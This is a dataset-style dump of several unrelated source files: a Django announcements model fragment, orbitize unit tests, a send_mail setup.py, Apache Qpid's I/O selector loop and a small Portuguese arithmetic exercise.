creation_date = models.DateTimeField(_("creation_date"), default=timezone.now)
site_wide = models.BooleanField(_("site wide"), default=False)
members_only = models.BooleanField(_("members only"), default=False)
dismissal_type = models.IntegerField(choices=DISMISSAL_CHOICES, default=DISMISSAL_SESSION)
publish_start = models.DateTimeField(_("publish_start"), default=timezone.now)
publish_end = models.DateTimeField(_("publish_end"), blank=True, null=True)
def get_absolute_url(self):
return reverse("pinax_announcements:announcement_detail", args=[self.pk])
def dismiss_url(self):
if self.dismissal_type != Announcement.DISMISSAL_NO:
return reverse("pinax_announcements:announcement_dismiss", args=[self.pk])
def __str__(self):
return self.title
class Meta:
verbose_name = _("announcement")
verbose_name_plural = _("announcements")
class Dismissal(models.Model):
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name="announcement_dismissals",
on_delete=models.CASCADE
)
announcement = models.ForeignKey(
Announcement,
related_name="dismissals",
on_delete=models.CASCADE
)
dismissed_at = models.DateTimeField(default=timezone.now)
| 33.269841
| 94
| 0.70229
|
4a15d3d09feade89cbaa3135ad0049363487dce1
| 1,580
|
py
|
Python
|
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
"""
Test the orbitize.basis which converts orbital elements
"""
import pytest
import numpy as np
import orbitize.basis as basis
def test_tau_t0_conversion():
"""
Test conversion back and forth
"""
tau = 0.1
ref_epoch = 51000 # MJD
period = 10 # years
t0 = basis.tau_to_t0(tau, ref_epoch, period)
assert t0 == pytest.approx(51000 + 365.25, rel=1e-7)
tau2 = basis.t0_to_tau(t0, ref_epoch, period)
assert tau == pytest.approx(tau2, rel=1e-7)
t0 = basis.tau_to_t0(tau, ref_epoch, period, after_date=47000)
assert t0 == pytest.approx(51000 - 9 * 365.25, rel=1e-7)
tau3 = basis.t0_to_tau(t0, ref_epoch, period)
assert tau == pytest.approx(tau3, rel=1e-7)
def test_tau_t0_conversion_vector():
"""
Make sure it works vectorized.
"""
taus = np.array([0.1, 0.2])
ref_epoch = 55000 # MJD
period = np.array([1, 0.5]) # years
t0s = basis.tau_to_t0(taus, ref_epoch, period)
for t0 in t0s:
assert t0 == pytest.approx(55000 + 365.25/10, rel=1e-7)
def test_switch_tau_basis():
"""
Switch reference epochs
"""
old_taus = np.array([0.5, 0.5])
ref_epoch = np.array([50000, 55000])
period = np.array([2, 2])
new_epoch = np.array([50000 + 365.25, 55000 + 365.25])
new_taus = basis.switch_tau_epoch(old_taus, ref_epoch, new_epoch, period)
assert new_taus[0] == pytest.approx(0, rel=1e-7)
assert new_taus[1] == pytest.approx(0, rel=1e-7)
if __name__ == "__main__":
test_tau_t0_conversion()
test_tau_t0_conversion_vector()
test_switch_tau_basis()
| 27.719298
| 77
| 0.651266
|
4a15d55bc2017d4eaf2007775230f1cdaf32b229
| 772
|
py
|
Python
|
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | 1
|
2021-11-24T14:30:21.000Z
|
2021-11-24T14:30:21.000Z
|
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | null | null | null |
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | null | null | null |
from setuptools import setup
with open('README.md', 'r') as desc:
long_description = desc.read()
setup(
name='send_mail',
version='0.0.2',
description='Sending emails in python just became much easier',
py_modules=['send_mail'],
package_dir={'': 'src'},
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)",
"Operating System :: OS Independent",
],
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/farhadzaidi/send_mail',
author='Farhad Zaidi',
author_email='zaidi.farhad03@gmail.com',
install_requires=[
'easy_colors',
],
)
| 27.571429
| 79
| 0.708549
|
4a15d5666257811168e840f42cbe15dd26055259
| 4,397
|
py
|
Python
|
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | null | null | null |
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | null | null | null |
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | 1
|
2021-01-28T17:43:54.000Z
|
2021-01-28T17:43:54.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import atexit, time, errno, os
from compat import select, SelectError, set, selectable_waiter, format_exc
from threading import Thread, Lock
from logging import getLogger
log = getLogger("qpid.messaging")
class Acceptor:
def __init__(self, sock, handler):
self.sock = sock
self.handler = handler
def fileno(self):
return self.sock.fileno()
def reading(self):
return True
def writing(self):
return False
def readable(self):
sock, addr = self.sock.accept()
self.handler(sock)
class Selector:
lock = Lock()
DEFAULT = None
_current_pid = None
@staticmethod
def default():
Selector.lock.acquire()
try:
if Selector.DEFAULT is None or Selector._current_pid != os.getpid():
sel = Selector()
atexit.register(sel.stop)
sel.start()
Selector.DEFAULT = sel
Selector._current_pid = os.getpid()
return Selector.DEFAULT
finally:
Selector.lock.release()
def __init__(self):
self.selectables = set()
self.reading = set()
self.writing = set()
self.waiter = selectable_waiter()
self.reading.add(self.waiter)
self.stopped = False
self.thread = None
self.exception = None
def wakeup(self):
self.waiter.wakeup()
def register(self, selectable):
self.selectables.add(selectable)
self.modify(selectable)
def _update(self, selectable):
if selectable.reading():
self.reading.add(selectable)
else:
self.reading.discard(selectable)
if selectable.writing():
self.writing.add(selectable)
else:
self.writing.discard(selectable)
return selectable.timing()
def modify(self, selectable):
self._update(selectable)
self.wakeup()
def unregister(self, selectable):
self.reading.discard(selectable)
self.writing.discard(selectable)
self.selectables.discard(selectable)
self.wakeup()
def start(self):
self.stopped = False
self.thread = Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start();
def run(self):
try:
while not self.stopped:
wakeup = None
for sel in self.selectables.copy():
t = self._update(sel)
if t is not None:
if wakeup is None:
wakeup = t
else:
wakeup = min(wakeup, t)
rd = []
wr = []
ex = []
while True:
try:
if wakeup is None:
timeout = None
else:
timeout = max(0, wakeup - time.time())
rd, wr, ex = select(self.reading, self.writing, (), timeout)
break
except SelectError, e:
# Repeat the select call if we were interrupted.
if e[0] == errno.EINTR:
continue
else:
# unrecoverable: promote to outer try block
raise
for sel in wr:
if sel.writing():
sel.writeable()
for sel in rd:
if sel.reading():
sel.readable()
now = time.time()
for sel in self.selectables.copy():
w = sel.timing()
if w is not None and now > w:
sel.timeout()
except Exception, e:
self.exception = e
info = format_exc()
log.error("qpid.messaging I/O thread has died: %s" % str(e))
for sel in self.selectables.copy():
if hasattr(sel, "abort"):
sel.abort(e, info)
raise
def stop(self, timeout=None):
self.stopped = True
self.wakeup()
self.thread.join(timeout)
self.thread = None
| 26.172619
| 74
| 0.622015
|
4a15d6957255b6c810178a98172daa14c2644979
| 495
|
py
|
Python
|
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
n1 = int(input('Digite um valor: '))
n2 = int(input('Outro valor: '))
so = n1 + n2
su = n1 - n2
m = n1 * n2
d = n1 / n2
di = n1 // n2
e = n1 ** n2
#print('A soma é {}, a subtração é {}, o produto é {}'.format(so, su, m))
print('A \033[4;30msoma\033[m é {}, a \033[4;31msubtração\033[m é {}, \n O \033[4;32mproduto\033[m é {},'.format(so, su, m), end=' ')
print('A \033[4;33mdivisão\033[m é {:.2f}, \n A \033[4;34mdivisão inteira\033[m é {}, \n E a \033[4;35mpotência\033[m {}'.format(d, di, e))
| 41.25
| 139
| 0.573737
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.